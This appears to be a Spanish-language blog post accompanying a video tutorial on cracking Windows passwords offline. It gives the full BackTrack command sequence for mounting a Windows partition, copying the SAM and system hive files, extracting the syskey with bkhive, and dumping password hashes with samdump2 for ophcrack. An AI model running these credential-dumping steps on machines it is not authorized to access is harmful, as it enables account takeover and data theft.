Offline Password Cracking - Bkhive & Samdump2 & Ophcrack

By delfirosales 19:54 BackTrack, Linux, Password Cracking, Security, Videotutoriales, VMware, Windows

En este vídeo se muestra como crackear una contraseña en un sistema windows apagado o de igual manera puede servir con tener la imagen de dicho sistema. En resumen para crackear las contraseñas de Windows desde una imagen o partición debe cumplirse tres tareas principales.

Obtener el Syskey (System key)
Extraer los hashes del archivo SAM
Crackear los hashes para determinar las contraseñas asociada

Offline Password Cracking - Bkhive & Samdump2 & Ophcrack from delfirosales on Vimeo.

Video Online
http://www.youtube.com/watch?v=lK8GX_7Bek8

Herramientas

Backtrack http://www.backtrack-linux.org/downloads/
Bkhive (contenida en backtrack)
Samdump2 (contenida en backtrack)
Ophcrack http://ophcrack.sourceforge.net/download.php
Rainbow Tables http://ophcrack.sourceforge.net/tables.php

Comandos

root@bt:~# fdisk -l
root@bt:~# mkdir /mnt/windows
root@bt:~# mount /dev/hda1 /mnt/windows
root@bt:~# mount -t ntfs-3g /dev/sda1 /mnt/usb -o force
root@bt:~# cd /mnt/windows/WINDOWS/system32/config/
root@bt:/mnt/windows/WINDOWS/system32/config/# ls
root@bt:/mnt/windows/WINDOWS/system32/config/# cp SAM /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cp system /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cd /mnt/usb
root@bt:/mnt/usb# bkhive system key
root@bt:/mnt/usb# samdump2 ./system ./SAM > /mnt/usb/hashes.txt
root@bt:/mnt/usb# cat ./hashes.txt
root@bt:/mnt/usb# poweroff